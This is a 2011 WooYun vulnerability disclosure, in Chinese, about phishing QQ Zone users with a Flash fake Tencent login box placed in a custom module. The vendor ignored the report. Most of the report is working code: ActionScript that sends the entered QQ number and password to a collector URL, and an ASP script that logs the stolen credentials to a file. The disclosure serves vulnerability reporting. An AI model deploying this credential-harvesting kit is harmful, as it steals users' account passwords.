当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
QQ空间flash钓鱼
相关厂商:
漏洞作者:
提交时间:
2011-07-19 23:12
修复时间:
2011-07-20 08:56
公开时间:
2011-07-20 08:56
漏洞类型:
xss跨站脚本攻击
危害等级:
自评Rank:
10
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2011-07-19: 细节已通知厂商并且等待厂商处理中
2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

危害比较严重,今晚一无聊人事来社工我的时候发现的.可以钓鱼得到对方帐号密码.

详细说明:

QQ空间自定义模块,插入一个flash,flash做一个仿腾讯的登录框.flash里写如下动作

var str = "http://localhost/mail.asp";
ntxt.restrict = "0-9";
var scData = new LoadVars();
scData.onLoad = function (success)
{
if (!success)
{
msg.text = "错误:用户密码错误!";
}
else
{
msg.text = "错误:用户密码错误!";
} // end else if
gotoAndStop(4);
};
sub_btn.onRelease = function ()
{
var _loc1 = ntxt.text;
var _loc2 = ptxt.text;
if (_loc2.length > 5 && _loc1.length > 4)
{
scData.QQNumber = _loc1;
scData.QQPassWord = _loc2;
scData.sendAndLoad(str, scData, "get");
} // end if
if (_loc2.length < 6 || _loc1.length < 5)
{
ntxt.text = "";
ptxt.text = "";
} // end if
};
stop ();


mail.asp里写收信代码

<%
strLogFile="testqqhahaha.txt"
QQNumber=request("QQNumber")
QQPassWord=request("QQPassWord")
if QQNumber="" or QQPassWord="" then
response.write "哈哈哈哈"
response.end
End If
StrLogText=StrLogText&QQNumber&"----"&QQPassWord
StrLogText=StrLogText&"----"&date&" "&time
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(StrLogText)
ff.close
set ff=nothing
set f=nothing
response.write "嘿嘿嘿嘿!"
%>


漏洞证明:

http://user.qzone.qq.com/5447055
提交了,俺就收到了...
我只是为了提交漏洞做的演示,腾讯官方可别给俺QQ封了...

修复方案:

你们比我专业...

版权声明:转载请注明来源 only_guest@乌云


>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-07-20 08:56

厂商回复:

添加对漏洞的补充说明以及做出评价的理由

漏洞Rank:2 (WooYun评价)

最新状态:

暂无